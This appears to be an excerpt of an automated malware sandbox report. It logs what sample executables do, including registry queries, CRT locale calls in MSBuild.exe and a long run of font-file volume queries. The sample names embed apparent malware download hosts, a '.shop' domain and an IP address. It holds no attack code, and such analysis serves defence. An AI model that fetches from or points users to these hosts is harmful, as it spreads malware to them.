Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	8_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	8_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	8_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	8_2_0042E7C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Users\user\Desktop\bomb.exe	Queries volume information: C:\Users\user\Desktop\bomb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
